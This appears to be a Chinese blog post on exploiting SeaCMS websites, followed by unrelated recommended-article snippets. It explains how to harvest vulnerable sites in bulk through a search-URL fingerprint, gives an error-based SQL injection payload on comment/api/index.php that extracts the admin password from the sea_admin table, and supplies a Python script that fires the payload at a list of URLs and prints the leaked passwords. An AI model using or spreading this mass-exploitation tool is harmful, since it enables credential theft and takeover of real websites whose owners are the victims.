海洋seacms漏洞利用
0x001-url采集
通过对海洋cms源码研究,找出含有标志性的网站目录(search.php?searchtype=),然后利用url采集工具批量采集seacms网站
0x002-漏洞payload
payload:/`comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27
0x003-exp制作
import requests
import re
urls = open("url.txt","r")
a = []
for url in urls:url1 = url.strip()a.append(url1)
urls.close()
aa = list(set(a))
with open("url.txt","w") as f:result = "\n".join(aa)f.write(result)
urls = open("url.txt", "r")
exp = '/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`'
pattern = re.compile("error: '(.*?)'")
for url in urls:try:target = url.strip() + exphtml = requests.get(target).textif "seacms" in html:print(target)print("该url存在漏洞:"+url)print(re.search(pattern,html).group(1))except Exception as e:pass
0x004-exp的使用效果*
海洋seacms漏洞利用相关推荐
- CORS漏洞利用检测和利用方式
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...
- 流行漏洞利用工具包瞄准Flash、Java和IE
Digital Shadows研究了"In the Business of Exploitation"中22个漏洞利用工具包,发现共有76个被瞄准的漏洞.最常被利用的软件应该不会太 ...
- Flash Player漏洞利用Exploiting Flash Reliably
以下消息来自幻影论坛[Ph4nt0m]邮件组 前两天推荐过Mark Dowd的Paper "Exploiting Flash Reliably" [url]http://hi. ...
- 溢出漏洞利用小结(基础)
shell 获取小结 这里总结几种常见的获取 shell 的方式: 执行 shellcode,这一方面也会有不同的情况 可以直接返回 shell 可以将 shell 返回到某一个端口 shellcod ...
- 7. Vulnerability exploitation tools (漏洞利用工具 11个)
Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...
- ASP.net 资源请求漏洞利用工具PadBuster
ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...
- ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 参考文章: (1)ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 (2)ht ...
- S2-045漏洞利用工具解决方案
S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...
- WPS漏洞利用工具Bully常见命令集合
WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.
最新文章
- java并发读取相同的文件_高效读取大文件,再也不用担心 OOM 了!
- CF476D Dreamoon and Sets (数学/思维)
- Spring boot 启动后执行特定的操作
- PHP5中数组函数总结
- Python——eventlet.greenpool
- 负margin应用案例几则(转载+总结)
- mean shift 图像分割(一、二、三)
- YARN作业提交流程剖析
- python抛硬币正面向上概率_Python-计算抛硬币出现连续10次正面朝上的概率的仿真实验...
- IIC,SPI,I2S
- 轴承过盈量程序matlab,轴承matlab处置程序.doc
- Debug查看汉字机内码
- 嵌入式中的 C 语言
- OpenGL渲染YUV420P
- IPC的标准是什么?
- c语言编程求广义逆矩阵,求大神解答求广义逆矩阵的问题 拜谢了!!
- 出现C:\Users\liu\AppData\Local\Programs\Python\Python35\lib\site-packages\tensorflow\contrib\rnn\pytho
- git 分支关系图谱讲解
- SAP ABAP MOVE 及 CORRESPONDING 7.4版本新用法
- Windows查看Java内存使用情况
热门文章
- error: stray ‘\’ in program
- 所有的错误都是精心包装的礼物
- python一小时快速入门(一)
- kubernetes不同的命名空间下的容器能通信吗_深入浅出聊聊Kubernetes网络:容器网络初探...
- 总结移动端video视频播放的坑
- 加拿大红河学院计算机专业,加拿大红河学院都有什么专业
- HOJ 2739 网络流【带权有向图上的中国邮路问题】
- rocketMq源码启动
- 更新日志 150930 - 视频时代
- ganglia离线安装_ganglia安装教程(centos7)